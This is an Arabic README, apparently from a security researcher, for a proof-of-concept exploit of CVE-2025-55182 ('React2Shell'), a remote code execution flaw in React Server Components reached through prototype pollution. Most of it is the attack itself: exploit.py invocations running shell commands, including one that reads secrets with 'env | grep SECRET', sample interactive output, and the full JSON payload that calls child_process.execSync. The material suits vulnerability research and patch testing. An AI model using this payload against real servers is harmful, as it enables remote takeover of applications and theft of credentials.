
إثبات مفهوم لاستغلال CVE-2025-55182 (React2Shell)، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في مكونات خادم React عبر تلوث النموذج الأولي. يتضمن أوضاع استغلال تفاعلية وسطر الأوامر.
تقوم مكونات خادم React بإلغاء تسلسل FormData بطريقة غير آمنة. تؤدي حقول multipart المعدة خصيصًا إلى تلوث النموذج الأولي وتنفيذ تعليمات برمجية عشوائية عبر child_process.execSync.
npm install
pip3 install requests
npm run dev
يعمل التطبيق على: http://localhost:3000
python3 exploit.py -c "whoami"
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"
python3 exploit.py -i
> whoami
COMMAND RESULT:
your-username
============================================================
> pwd
COMMAND RESULT:
/path/to/project
============================================================
> exit
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
npm run dev
python3 exploit.py -c "whoami"
python3 exploit.py -c "whoami" -v
يظهر هيكل الحمولة الكامل واستجابة الخادم
بواسطة Guaxinim | أبحاث الأمن السيبراني